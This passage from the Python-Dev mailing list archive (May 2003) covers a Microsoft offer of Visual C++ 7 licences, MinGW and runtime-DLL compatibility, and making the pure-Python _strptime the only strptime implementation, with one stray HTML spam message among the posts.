compiler options and finding the code then breaks, so I agree 
that it would need much more testing. It also needs more 
testing to see whether it makes any kind of difference to real 
programs as well as benchmarks. If I knew any way to get the 
compiler to tell me which functions it inlined, then it would 
probably also be possible to get most of the speedup by 
explicitly inlining a few functions and avoiding most of the 
hit on the code size.

-- 
Duncan Booth                                     
duncan@rcp.co.uk
int month(char *p){return(124864/((p[0]+p[1]-
p[2]&0x1f)+1)%12)["\5\x8\3"
"\6\7\xb\1\x9\xa\2\0\4"];} // Who said my code was obscure?
http://dales.rmplc.co.uk/Duncan



From mal@lemburg.com  Fri May  9 10:28:37 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Fri, 09 May 2003 11:28:37 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHCEONFJAA.tim.one@comcast.net>
References: <BIEJKCLHCIOIHAGOKOLHCEONFJAA.tim.one@comcast.net>
Message-ID: <3EBB74C5.7090600@lemburg.com>

Tim Peters wrote:
> [M.-A. Lemburg]
> 
>>...
>>Perhaps we should look at the offer in a different light...
>>
>>What advantage would the move from VC6 to VC7 give Python users ?
> 
> In general, smaller and faster code is a decent bet.  For those who use VC7
> already, an easier life.  "Move" implies abandoning VC6, though, and I don't
> think that's a realistic possibility now -- although over time it's
> inevitable (VC6 is akin to Python 1.5.2 now:  beloved by some but
> unsupported by all <wink>).

True :-)

How about adding support for VC7 features in 2.4 and starting the
transition in 2.5 ?

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Software directly from the Source  (#1, May 09 2003)
 >>> Python/Zope Products & Consulting ...         http://www.egenix.com/
 >>> mxODBC, mxDateTime, mxTextTools ...        http://python.egenix.com/
________________________________________________________________________
EuroPython 2003, Charleroi, Belgium:                        46 days left



From mal@lemburg.com  Fri May  9 10:29:57 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Fri, 09 May 2003 11:29:57 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <3EBB74C5.7090600@lemburg.com>
References: <BIEJKCLHCIOIHAGOKOLHCEONFJAA.tim.one@comcast.net> <3EBB74C5.7090600@lemburg.com>
Message-ID: <3EBB7515.2090709@lemburg.com>

M.-A. Lemburg wrote:
> How about adding support for VC7 features in 2.4 and starting the
> transition in 2.5 ?

This would also allow MS to ship SP2 for VC7 by then ;-)

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Software directly from the Source  (#1, May 09 2003)
 >>> Python/Zope Products & Consulting ...         http://www.egenix.com/
 >>> mxODBC, mxDateTime, mxTextTools ...        http://python.egenix.com/
________________________________________________________________________
EuroPython 2003, Charleroi, Belgium:                        46 days left



From drifty@alum.berkeley.edu  Fri May  9 10:31:26 2003
From: drifty@alum.berkeley.edu (Brett Cannon)
Date: Fri, 9 May 2003 02:31:26 -0700 (PDT)
Subject: [Python-Dev] Make _strptime only time.strptime implementation?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCCEFMEJAB.tim_one@email.msn.com>
References: <LNBBLJKPBEHFEDALKOLCCEFMEJAB.tim_one@email.msn.com>
Message-ID: <Pine.SOL.4.55.0305090229430.21553@death.OCF.Berkeley.EDU>

[Tim Peters]

> As we left it, we were going to wait for the 2.3 alpha and beta testers to
> raise a stink if the new implementation didn't work out for them (you'll
> recall that the call to the platform strptime() is disabled in 2.3b1, via an
> unconditional
>
> #undef HAVE_STRPTIME
>
> in timemodule.c).  Nobody has even cut a little gas yet,

I got a single email from someone asking me to change the functionality so
that it would raise an exception if part of the input string was not
parsed.  Otherwise I found one error and dealt with it.

> so I'd proceed under the assumption that nobody will, and that the
> disable HAVE_STRTIME code will be physically deleted.  If that turns out
> to be wrong, big deal, you stay up all night fixing it under intense
> pressure <wink>.
>

OK.  If by 2.3b2 no one has said anything I will go ahead and cut out the
C code and update the docs.

-Brett


From jacobs@penguin.theopalgroup.com  Fri May  9 11:30:45 2003
From: jacobs@penguin.theopalgroup.com (Kevin Jacobs)
Date: Fri, 9 May 2003 06:30:45 -0400 (EDT)
Subject: [Python-Dev] Make _strptime only time.strptime implementation?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCCEFMEJAB.tim_one@email.msn.com>
Message-ID: <Pine.LNX.4.44.0305090626590.3645-100000@penguin.theopalgroup.com>

On Fri, 9 May 2003, Tim Peters wrote:
> As we left it, we were going to wait for the 2.3 alpha and beta testers to
> raise a stink if the new implementation didn't work out for them (you'll
> recall that the call to the platform strptime() is disabled in 2.3b1, via an
> unconditional
> 
> #undef HAVE_STRPTIME
> 
> in timemodule.c).  Nobody has even cut a little gas yet, so I'd proceed
> under the assumption that nobody will, and that the disable HAVE_STRTIME
> code will be physically deleted.  If that turns out to be wrong, big deal,
> you stay up all night fixing it under intense pressure <wink>.

Actually, I did, and on python-dev.  strptime did not roundtrip correctly
with mktime on Linux.  This made my application very unhappy, so I removed
all calls to strptime. Right now I don't have a vested interest in shooting
holes in the Python strptime, but I can't say I feel any warm fuzzies about
it.  It seems hard to imagine that others will not run into similar
problems, regardless of the lack of specification for exactly how strptime
aught to work.

-Kevin

-- 
--
Kevin Jacobs
The OPAL Group - Enterprise Systems Architect
Voice: (216) 986-0710 x 19         E-mail: jacobs@theopalgroup.com
Fax:   (216) 986-0714              WWW:    http://www.theopalgroup.com



From eyplie6374@yahoo.com  Fri May  9 06:40:49 2003
From: eyplie6374@yahoo.com (Karla Trotter)
Date: Fri, 09 May 03 05:40:49 GMT
Subject: [Python-Dev] composition sjvdkhxa k
Message-ID: <73h$8$jxw358$ju9$4y@b5zl1v>

This is a multi-part message in MIME format.

--3BA722DE9E_1_0
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<body topmargin=3D"0" leftmargin=3D"0">
<div align=3D"center">
  <table width=3D"100%" border=3D"0" cellpadding=3D"0" cellspacing=3D"0">
    <tr>
      <td bgcolor=3D"#FFFFFF">&nbsp;</td>
    </tr>
    <tr>
      <td bgcolor=3D"#FFFFFF">&nbsp;</td>
    </tr>
    <tr>
      <td>&nbsp;</td>
    </tr>
    <tr>
      <td><div align=3D"center">
          <table width=3D"600" border=3D"1" cellpadding=3D"0"
cellspacing=3D=
"0" bordercolor=3D"#CCCCCC">
            <tr>
              <td><a href=3D"http://www.blastcam.net/htm11/form.htm"><img =
src=3D"http://www.blastcam.net/htm11/images/htm11.gif" width=3D"600" heigh=
t=3D"500" border=3D"0"></a></td>
            </tr>
          </table>
        </div></td>
    </tr>
    <tr>
      <td>
      <p align=3D"center"><img src=3D"http://www.blastcam.net/htm11/images=
/footer.gif" alt=3D"" name=3D"footer3" width=3D"600" height=3D"60"
border=3D=
"0" usemap=3D"#footer3Map">
  <map name=3D"footer3Map">
    <area shape=3D"rect" coords=3D"491,22,563,40" href=3D"http://www.blast=
cam.net/nope.html">
    <area shape=3D"rect" coords=3D"85,43,486,61" href=3D"http://www.blastc=
am.net/htm11/form.htm">
  </map>
      </p>
&nbsp;</td>
    </tr>
    <tr>
      <td bgcolor=3D"#FFFFFF">&nbsp;</td>
    </tr>
    <tr>
      <td bgcolor=3D"#FFFFFF">&nbsp;</td>
    </tr>
  </table>
</div>
</body>
</html>jehqsuezeitehrh bbickzs ldqyjgl d
clahhpyvhoaryuiojchowuoa smlmlpfh
 hyhhmc
qms v muw

--3BA722DE9E_1_0--



From gsw@agere.com  Fri May  9 13:47:49 2003
From: gsw@agere.com (Williams, Gerald S (Jerry))
Date: Fri, 9 May 2003 08:47:49 -0400
Subject: [Python-Dev] MS VC 7 offer
Message-ID: <937756AF9E0BDC4396C09F32D8B41F2B2FE238@pauex2ku01.agere.com>

Paul Moore wrote:
> One further data point - the free mingw gcc compiler generates
> binaries which depend on msvcrt.dll. So, if the Pythonlabs
> distribution switches to MSVC7, developers using MSVC6 *and*
> developers using mingw will be unable to build compatible extensions. 
> The only compatible compiler will be MSVC7 (either the paid for
> version or the free limited version).

Are there any reasons why we can't just switch to MINGW
instead? If the VC7 RT is the way of the future, then
presumably MINGW will eventually support it. If not, it
might be better to avoid VC7 anyway. :-)

gsw


From Paul.Moore@atosorigin.com  Fri May  9 13:57:58 2003
From: Paul.Moore@atosorigin.com (Moore, Paul)
Date: Fri, 9 May 2003 13:57:58 +0100
Subject: [Python-Dev] MS VC 7 offer
Message-ID: <16E1010E4581B049ABC51D4975CEDB880113DACF@UKDCX001.uk.int.atosorigin.com>

From: Williams, Gerald S (Jerry) [mailto:gsw@agere.com]
> Are there any reasons why we can't just switch to MINGW
> instead? If the VC7 RT is the way of the future, then
> presumably MINGW will eventually support it. If not, it
> might be better to avoid VC7 anyway. :-)

I've asked on the mingw users list about VC7 compatibility.
It's quite possible that the msvcr71.dll EULA conditions
will make this a non-starter, though (I don't understand
them, but they sound scary...)

Paul.


From gh@ghaering.de  Fri May  9 14:06:00 2003
From: gh@ghaering.de (=?ISO-8859-1?Q?Gerhard_H=E4ring?=)
Date: Fri, 09 May 2003 15:06:00 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <937756AF9E0BDC4396C09F32D8B41F2B2FE238@pauex2ku01.agere.com>
References: <937756AF9E0BDC4396C09F32D8B41F2B2FE238@pauex2ku01.agere.com>
Message-ID: <3EBBA7B8.6030309@ghaering.de>

Williams, Gerald S (Jerry) wrote:
> Paul Moore wrote:
> 
>>One further data point - the free mingw gcc compiler generates
>>binaries which depend on msvcrt.dll. So, if the Pythonlabs
>>distribution switches to MSVC7, developers using MSVC6 *and*
>>developers using mingw will be unable to build compatible extensions. 
>>The only compatible compiler will be MSVC7 (either the paid for
>>version or the free limited version).
> 
> Are there any reasons why we can't just switch to MINGW
> instead?

Yes. Several:

1) Python can't be built with MINGW, yet. I'm working on it, and so are 
other people, apparently (search python-list).

2) The Microsoft IDE is a more productive development environment for 
those that develop Python on Windows. I'm not sure, but my uneducated 
guess is that there are only a few Python developers who do any 
significant work on the win32 side, I only know about Guido, Tim, Mark. 
Those that actually put Python forward on win32 should decide about 
their development environment, IMO.

My guess is that MINGW will eventually be a supported platform, but not 
the primary method of building Python.

FWIW, Mozilla recently (1.4 beta 1) got compilable with mingw on win32. 
They're calling mingw a "tier 3" platform, while MSVC is a "tier 1" 
platform. I haven't looked up the terms, but I guess that "tier 3" means 
"nice to have" for a realease, while "tier 1" means "must have".

I reckon the situation will be a similar one for Python once it'll gain 
mingw support.

> If the VC7 RT is the way of the future, then
> presumably MINGW will eventually support it. [...]

"Eventually" being the keyword here.

-- Gerhard


From Paul.Moore@atosorigin.com  Fri May  9 14:09:47 2003
From: Paul.Moore@atosorigin.com (Moore, Paul)
Date: Fri, 9 May 2003 14:09:47 +0100
Subject: [Python-Dev] MS VC 7 offer
Message-ID: <16E1010E4581B049ABC51D4975CEDB880113DAD1@UKDCX001.uk.int.atosorigin.com>

From: Moore, Paul=20
> I've asked on the mingw users list about VC7 compatibility.
> It's quite possible that the msvcr71.dll EULA conditions
> will make this a non-starter, though (I don't understand
> them, but they sound scary...)

FWIW, I just got a reply from the mingw list. Because msvcrt
is distributed with the OS, and msvcr7 is not, GPL
compatibility becomes an issue. Specifically, mingw exploits
a specific clause in the GPL which allows dependencies on
"components of the OS". MSVCRT qualifies here, but MSVCR7
doesn't. So I don't think mingw will support building DLLs
which use MSVCR7 for the forseeable future :-(

Paul.


From tim@zope.com  Fri May  9 15:30:34 2003
From: tim@zope.com (Tim Peters)
Date: Fri, 9 May 2003 10:30:34 -0400
Subject: [Python-Dev] Make _strptime only time.strptime implementation?
In-Reply-To: <Pine.LNX.4.44.0305090626590.3645-100000@penguin.theopalgroup.com>
Message-ID: <BIEJKCLHCIOIHAGOKOLHAEBIFKAA.tim@zope.com>

[Tim]
>> Nobody has even cut a little gas yet, so I'd proceed under the
>> assumption that nobody will, and that the disable HAVE_STRTIME
>> code will be physically deleted.

[Kevin Jacobs]
> Actually, I did, and on python-dev.

Sorry, I meant since 2.3b1 was released.  It's the purpose of pre-releases
to find problems, and the whineometer gets reset when a new pre-release goes
out.

> strptime did not roundtrip correctly with mktime on Linux.

It was my understanding (possibly wrong, and please correct me if it is)
that Brett fixed this.

> This made my application very unhappy, so I removed all calls to
> strptime.  Right now I don't have a vested interest in shooting
> holes in the Python strptime, but I can't say I feel any warm
> fuzzies aboutit.  It seems hard to imagine that others will not run
> into similar problems, regardless of the lack of specification for
> exactly how strptime aught to work.

The primary problem isn't the lack of a crisp spec, although that's the root
cause of the real problem:  the problem is that how strptime behaves varies
in fact across boxes.  I don't expect anyone could have felt warm fuzzies
about that either, although someone could fool themself into hoping that the
platform strptime behavior they happened to get was the only behavior their
app would ever see.  With a single implementation of strptime across
platforms, that pleasant fantasy gets close to becoming the truth.  Python
is supposed to be a *little* less platform-dependent than C <wink>.



From guido@python.org  Fri May  9 15:38:09 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 09 May 2003 10:38:09 -0400
Subject: [Python-Dev] Make _strptime only time.strptime implementation?
In-Reply-To: "Your message of Fri, 09 May 2003 02:31:26 PDT."
 <Pine.SOL.4.55.0305090229430.21553@death.OCF.Berkeley.EDU>
References: <LNBBLJKPBEHFEDALKOLCCEFMEJAB.tim_one@email.msn.com>
 <Pine.SOL.4.55.0305090229430.21553@death.OCF.Berkeley.EDU>
Message-ID: <200305091438.h49Ec9K08904@pcp02138704pcs.reston01.va.comcast.net>

> I got a single email from someone asking me to change the
> functionality so that it would raise an exception if part of the
> input string was not parsed.

That sounds like a good idea on the face of it.  Or will this break
existing code?

--Guido van Rossum (home page: http://www.python.org/~guido/)




From jacobs@penguin.theopalgroup.com  Fri May  9 15:48:28 2003
From: jacobs@penguin.theopalgroup.com (Kevin Jacobs)
Date: Fri, 9 May 2003 10:48:28 -0400 (EDT)
Subject: [Python-Dev] Make _strptime only time.strptime implementation?
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHAEBIFKAA.tim@zope.com>
Message-ID: <Pine.LNX.4.44.0305091042030.5143-100000@penguin.theopalgroup.com>

On Fri, 9 May 2003, Tim Peters wrote:
> > strptime did not roundtrip correctly with mktime on Linux.
> 
> It was my understanding (possibly wrong, and please correct me if it is)
> that Brett fixed this.

I've just retested with my original code and it does look like Brett has
indeed fixed it.  Or at least fixed it to the point that mktime doesn't
croak on Linux, Solaris, Tru64, and IRIX with our app.

> The primary problem isn't the lack of a crisp spec, although that's the root
> cause of the real problem:  the problem is that how strptime behaves varies
> in fact across boxes.

Or more importantly that strptime is now standardized in Python, while
mktime is not.

Given that my previous problems with the Python strptime have been
addressed, I am now +1 on using it (although I'm still going to avoid it and
mktime in my code as much as possible).

-Kevin

-- 
--
Kevin Jacobs
The OPAL Group - Enterprise Systems Architect
Voice: (216) 986-0710 x 19         E-mail: jacobs@theopalgroup.com
Fax:   (216) 986-0714              WWW:    http://www.theopalgroup.com



From gsw@agere.com  Fri May  9 17:12:57 2003
From: gsw@agere.com (Williams, Gerald S (Jerry))
Date: Fri, 9 May 2003 12:12:57 -0400
Subject: [Python-Dev] MS VC 7 offer
Message-ID: <937756AF9E0BDC4396C09F32D8B41F2B2FE23B@pauex2ku01.agere.com>

There'll always be pressure to use VC for interoperability
reasons. Some would attribute this to FUD. I'm not ready to
go that far.

My personal (admittedly probably controversial) preference
would be to eventually drop VC support entirely in favor of
existing free optimizing compilers. Of course, if Microsoft
makes an optimizing compiler available for free to everyone,
it would make this position much more difficult to maintain.
Surprisingly, it sounds like the latter may be more likely
than the former.

If Python is moving toward VC7, I'd like to be counted in
for a copy. I'd rather not switch, but it sounds like I'd
have to, especially if there are legal issues with the VC7
runtime libraries.

Gerhard H=E4ring wrote:
> 1) Python can't be built with MINGW, yet. I'm working on it,=20
> and so are other people, apparently (search python-list).

Good point. We don't know the full extent of the issues yet.

> 2) The Microsoft IDE is a more productive development environment for =

> those that develop Python on Windows.

I'm not going to tell anyone that they can't use their IDE
of choice, but keep in mind that IDE !=3D compiler. Setting
up project files to use different build tools isn't hard.
If you're concerned about VC-specific debug information,
you could still use VC for debug builds.

gsw


From martin@v.loewis.de  Fri May  9 17:28:09 2003
From: martin@v.loewis.de (=?ISO-8859-1?Q?=22Martin_v=2E_L=F6wis=22?=)
Date: Fri, 09 May 2003 18:28:09 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <937756AF9E0BDC4396C09F32D8B41F2B2FE23B@pauex2ku01.agere.com>
References: <937756AF9E0BDC4396C09F32D8B41F2B2FE23B@pauex2ku01.agere.com>
Message-ID: <3EBBD719.7040209@v.loewis.de>

Williams, Gerald S (Jerry) wrote:

> My personal (admittedly probably controversial) preference
> would be to eventually drop VC support entirely in favor of
> existing free optimizing compilers. 

You make it sound as if compilers are a religion.
They are tools, and it matters how good they cooperate with Python on 
some system. They are not competitors, so you can Python cooperate with 
existing free optimizing compilers, and simultaneously support VC.

> Of course, if Microsoft
> makes an optimizing compiler available for free to everyone,
> it would make this position much more difficult to maintain.

Your position is already difficult to maintain. He who makes the release 
choses the tool. This is free software: If you don't like that release, 
make a different one.

> If Python is moving toward VC7, I'd like to be counted in
> for a copy. 

Python is not moving towards or away from specific product. If it is 
moving at all, it is moving towards ISO C99. We are talking about the 
PythonLabs Windows installer, not about "Python".

> I'm not going to tell anyone that they can't use their IDE
> of choice, but keep in mind that IDE != compiler. Setting
> up project files to use different build tools isn't hard.
> If you're concerned about VC-specific debug information,
> you could still use VC for debug builds.

Somebody will have to maintain the VC makefiles. That somebody won't 
simultaneously maintain a MingW infrastructure, because of time 
constraints. So to use a MingW release process, we would need a 
volunteer to produce such a release. Do you volunteer?

Regards,
Martin




From gsw@agere.com  Fri May  9 18:43:29 2003
From: gsw@agere.com (Williams, Gerald S (Jerry))
Date: Fri, 9 May 2003 13:43:29 -0400
Subject: [Python-Dev] MS VC 7 offer
Message-ID: <937756AF9E0BDC4396C09F32D8B41F2B2FE23C@pauex2ku01.agere.com>

Martin v. L=F6wis wrote:
> You make it sound as if compilers are a religion.

Hardly intended, but when Microsoft (and the FSF) are
involved, somehow religious wars often pop up. :-)

> > If Python is moving toward VC7, [...]
>
> Python is not moving towards or away from specific product [...]
> We are talking about the PythonLabs Windows installer,

You are correct. Replace "Python" with "the PythonLabs
Windows installer".

> Somebody will have to maintain the VC makefiles. That somebody won't=20
> simultaneously maintain a MingW infrastructure, because of time=20
> constraints. So to use a MingW release process, we would need a=20
> volunteer to produce such a release. Do you volunteer?

Not today, maybe tomorrow. I'm already maintaining the
SWIG package for Cygwin and not putting as much time
into that as I should. Plus I have a new public domain
project on SourceForge that I'm trying to get off the
ground.

I appreciate the need for having somebody actually do
the work (especially the initial port). I'm glad to
hear a few people are already working on this one.

gsw


From tim.one@comcast.net  Fri May  9 20:08:44 2003
From: tim.one@comcast.net (Tim Peters)
Date: Fri, 09 May 2003 15:08:44 -0400
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <3EBB74C5.7090600@lemburg.com>
Message-ID: <BIEJKCLHCIOIHAGOKOLHEEDBFKAA.tim.one@comcast.net>

[M.-A. Lemburg]
> How about adding support for VC7 features in 2.4

AFAIK, current CVS Python compiles under VC7 now.

> and starting the transition in 2.5 ?

I expect that mostly depends on who's doing the work.  PLabs Windows
development is on auto-pilot (aka benign neglect).  The first person to
volunteer time to do anything here gets to set the policy for the next two
decades <0.9 wink>.



From mal@lemburg.com  Fri May  9 21:15:23 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Fri, 09 May 2003 22:15:23 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHEEDBFKAA.tim.one@comcast.net>
References: <BIEJKCLHCIOIHAGOKOLHEEDBFKAA.tim.one@comcast.net>
Message-ID: <3EBC0C5B.7030101@lemburg.com>

Tim Peters wrote:
> [M.-A. Lemburg]
> 
>>How about adding support for VC7 features in 2.4
> 
> AFAIK, current CVS Python compiles under VC7 now.

That's nice :-) I meant: adding features from VC7 to Python.

>>and starting the transition in 2.5 ?
> 
> I expect that mostly depends on who's doing the work.  PLabs Windows
> development is on auto-pilot (aka benign neglect).  The first person to
> volunteer time to do anything here gets to set the policy for the next two
> decades <0.9 wink>.

How come ? I always thought that Zope's main deployment platform
is Windows....

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Software directly from the Source  (#1, May 09 2003)
 >>> Python/Zope Products & Consulting ...         http://www.egenix.com/
 >>> mxODBC, mxDateTime, mxTextTools ...        http://python.egenix.com/
________________________________________________________________________
EuroPython 2003, Charleroi, Belgium:                        46 days left



From guido@python.org  Fri May  9 21:32:05 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 09 May 2003 16:32:05 -0400
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: Your message of "Tue, 06 May 2003 18:06:11 EDT."
Message-ID: <200305092032.h49KW5B11937@pcp02138704pcs.reston01.va.comcast.net>

Here's a reply from Nick Hodapp.  In a later email he also said:

> And I wouldn't dream of giving you Standard ;)
> 
> Today the C++ optimizer is NOT in the freely available tools.  We
> are fixing this, but the timeframe is uncertain.

My own suggestion: let's ask for copies for the lead Windows
developers who are distributing Windows binaries of core Python (that
would be Tim & me) or major addons (several have been mentioned here).

Then we can see how well this works, and together we can agree on a
"sunset date" for the VC6-based installer.  If you feel you qualify or
you know someone who you think qualify, send me *private* email.

--Guido van Rossum (home page: http://www.python.org/~guido/)

> From: "Nick Hodapp"
> To: "Guido van Rossum"
> Date: Thu, 8 May 2003 17:28:45 -0700
> 
> Guido --
> 
> I read much of the archived thread.  I'll respond here in email:
> 
> 1)  There was confusion about which version of Visual C++.  The version
> that I'm willing to donate to core Python developers is the most recent,
> Visual C++ .NET 2003, aka. VC 7.1.  I don't fully understand how many
> "core developers" there are, but let's cap my gift at 10 copies.  
> 
> 2)  There was a question about how quickly I could provide the licenses,
> and whether I would give media or cash.  I'd be providing boxed copies
> of the product (likely our "Professional" edition) and recipients would
> likely have to wait a month or so since we're not yet stocked
> internally.  
> 
> 3)  There was a question about redistributing the C-runtime DLLs.  While
> Microsoft recommends redistributing these using "merge modules" to
> prevent versioning issues, this is not mandatory.  From the product
> documentation:
> 
> "Visual Studio .NET provides its redistributable files in the form of
> merge modules. These merge modules encapsulate the redistributable DLLs
> and can be used by setup projects or other redistribution tools. Using
> the merge modules ensures that the correct files are redistributed with
> an application. However, if your installer does not support distributing
> merge modules, you can redistribute the DLLs embedded in the merge
> modules. You need to either extract the DLLs from the merge modules or
> get them from the product CD or DVD. Do not copy files from your hard
> disk."
> 
> Also, you can statically bind to the C-runtime to avoid this issue
> entirely.
> 
> 3)  Several questions regarding the build system.  What features you
> make use of are entirely up to you.  Know that VC7 and VC7.1 do not
> support the "export makefile" feature that is in VC6.  My recommendation
> would be to use the VC build system, but that is personal taste.  Allow
> me to hint that a command-line-tool version of the build/project system
> is likely to be made available for free in the near future.  But that is
> just a hint, not a promise.
> 
> 4)  Several questions about binary compatibility of object files.   I
> don't believe we broke binary compatibility for linking (you should be
> able to link a VC6 object file with a VC7.1 generated object module).
> I'll follow up and get a confirmation.  We did break binary
> compatibility -- on purpose -- for some of the libraries, including MFC.
> I doubt you guys use MFC.
> 
> 
> The kind of feedback on the thread you sent is great -- I can use it as
> input for how we design and package future product.  My sole intent here
> is to provide our new tool to some influential C++ developers in the
> community.  I've made the same offer to the Boost community.  
> 
> I'm also willing to help figure out if we can build Python completely
> with the freely available SDK tools I mentioned.  I don't know if this
> is possible, but it would be fun to try -- and a plus for your community
> if we succeed.  
> 
> 
> Nick


From martin@v.loewis.de  Fri May  9 21:54:25 2003
From: martin@v.loewis.de (=?ISO-8859-1?Q?=22Martin_v=2E_L=F6wis=22?=)
Date: Fri, 09 May 2003 22:54:25 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <3EBC0C5B.7030101@lemburg.com>
References: <BIEJKCLHCIOIHAGOKOLHEEDBFKAA.tim.one@comcast.net> <3EBC0C5B.7030101@lemburg.com>
Message-ID: <3EBC1581.3060303@v.loewis.de>

M.-A. Lemburg wrote:

>> AFAIK, current CVS Python compiles under VC7 now.
> 
> That's nice :-) I meant: adding features from VC7 to Python.

That is done as well. There is quite some conditional code that
selects features available only in VC7, such as usage of
getaddrinfo in the socket module.

Regards,
Martin



From tim.one@comcast.net  Fri May  9 21:58:28 2003
From: tim.one@comcast.net (Tim Peters)
Date: Fri, 09 May 2003 16:58:28 -0400
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <3EBC0C5B.7030101@lemburg.com>
Message-ID: <BIEJKCLHCIOIHAGOKOLHKEDLFKAA.tim.one@comcast.net>

[MAL]
>>> How about adding support for VC7 features in 2.4

[Tim]
>> AFAIK, current CVS Python compiles under VC7 now.

[MAL]
> That's nice :-) I meant: adding features from VC7 to Python.

Umm, could you name one?  VC7 is a compiler to me.  I don't what it means to
add a compiler feature to Python, so transformed the suggestion into one I
understood.

>>> and starting the transition in 2.5 ?

>> I expect that mostly depends on who's doing the work.  PLabs Windows
>> development is on auto-pilot (aka benign neglect).  The first person to
>> volunteer time to do anything here gets to set the policy for
>> the next two decades <0.9 wink>.

> How come ? I always thought that Zope's main deployment platform
> is Windows....

I don't know, but doubt it, and Windows users are conspicuous by absence on
the public Zope dev mailing lists.  Regardless, Zope strives to be a
platform-neutral application, so I've never been surprised that Zope Corp's
interest in Windows-specific Python work has been undetectable.



From drifty@alum.berkeley.edu  Sat May 10 00:41:25 2003
From: drifty@alum.berkeley.edu (Brett Cannon)
Date: Fri, 9 May 2003 16:41:25 -0700 (PDT)
Subject: [Python-Dev] Make _strptime only time.strptime implementation?
In-Reply-To: <200305091438.h49Ec9K08904@pcp02138704pcs.reston01.va.comcast.net>
References: <LNBBLJKPBEHFEDALKOLCCEFMEJAB.tim_one@email.msn.com>
 <Pine.SOL.4.55.0305090229430.21553@death.OCF.Berkeley.EDU>
 <200305091438.h49Ec9K08904@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <Pine.SOL.4.55.0305091636560.13192@death.OCF.Berkeley.EDU>

[Guido van Rossum]

> > I got a single email from someone asking me to change the
> > functionality so that it would raise an exception if part of the
> > input string was not parsed.
>
> That sounds like a good idea on the face of it.  Or will this break
> existing code?
>

Maybe.  If they depend on some specific behavior on a platform that offers
it, then yes, there could be issues.  But since the docs are so vague if
it does break code it will most likely be because someone didn't follow
the warnings in the spec.

And while we are on this subject, does anyone have any issues if I cause
_strptime to recognize UTC and GMT as timezones?  The Solaris box I always
use to do libc strptime comparisons to does not recognize it as an
acceptable value for %Z, but since it is a known fact that neither have
daylight savings I feel _strptime should recognize this fact and set the
daylight savings value to 0 insteading of raising an error saying it
doesn't know about that timezone.

Any objections to the change?

-Brett


From guido@python.org  Sat May 10 01:35:46 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 09 May 2003 20:35:46 -0400
Subject: [Python-Dev] Make _strptime only time.strptime implementation?
In-Reply-To: "Your message of Fri, 09 May 2003 16:41:25 PDT."
 <Pine.SOL.4.55.0305091636560.13192@death.OCF.Berkeley.EDU>
References: <LNBBLJKPBEHFEDALKOLCCEFMEJAB.tim_one@email.msn.com>
 <Pine.SOL.4.55.0305090229430.21553@death.OCF.Berkeley.EDU>
 <200305091438.h49Ec9K08904@pcp02138704pcs.reston01.va.comcast.net>
 <Pine.SOL.4.55.0305091636560.13192@death.OCF.Berkeley.EDU>
Message-ID: <200305100035.h4A0Zk812664@pcp02138704pcs.reston01.va.comcast.net>

[Brett]
> > > I got a single email from someone asking me to change the
> > > functionality so that it would raise an exception if part of the
> > > input string was not parsed.
> >
[Guido van Rossum]
> > That sounds like a good idea on the face of it.  Or will this break
> > existing code?

[Brett]
> Maybe.  If they depend on some specific behavior on a platform that offers
> it, then yes, there could be issues.  But since the docs are so vague if
> it does break code it will most likely be because someone didn't follow
> the warnings in the spec.

If you add some flag to control this behavior, defaulting to strict,
then at least people who rely on the old (non-strict) behavior can use
the flag rather than redesign their application.

> And while we are on this subject, does anyone have any issues if I cause
> _strptime to recognize UTC and GMT as timezones?  The Solaris box I always
> use to do libc strptime comparisons to does not recognize it as an
> acceptable value for %Z, but since it is a known fact that neither have
> daylight savings I feel _strptime should recognize this fact and set the
> daylight savings value to 0 insteading of raising an error saying it
> doesn't know about that timezone.
> 
> Any objections to the change?

Go for it.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From drifty@alum.berkeley.edu  Sat May 10 03:13:35 2003
From: drifty@alum.berkeley.edu (Brett C.)
Date: Fri, 09 May 2003 19:13:35 -0700
Subject: [Python-Dev] Make _strptime only time.strptime implementation?
In-Reply-To: <200305100035.h4A0Zk812664@pcp02138704pcs.reston01.va.comcast.net>
References: <LNBBLJKPBEHFEDALKOLCCEFMEJAB.tim_one@email.msn.com> <Pine.SOL.4.55.0305090229430.21553@death.OCF.Berkeley.EDU> <200305091438.h49Ec9K08904@pcp02138704pcs.reston01.va.comcast.net> <Pine.SOL.4.55.0305091636560.13192@death.OCF.Berkeley.EDU> <200305100035.h4A0Zk812664@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <3EBC604F.7040306@ocf.berkeley.edu>

Guido van Rossum wrote:
> [Brett]
> 
>>>>I got a single email from someone asking me to change the
>>>>functionality so that it would raise an exception if part of the
>>>>input string was not parsed.
>>>
> [Guido van Rossum]
> 
>>>That sounds like a good idea on the face of it.  Or will this break
>>>existing code?
> 
> 
> [Brett]
> 
>>Maybe.  If they depend on some specific behavior on a platform that offers
>>it, then yes, there could be issues.  But since the docs are so vague if
>>it does break code it will most likely be because someone didn't follow
>>the warnings in the spec.
> 
> 
> If you add some flag to control this behavior, defaulting to strict,
> then at least people who rely on the old (non-strict) behavior can use
> the flag rather than redesign their application.
> 

But the problem is that I have no idea what the old behavior is.  Since 
the spec is so vague and open I have no clue what all the various libc 
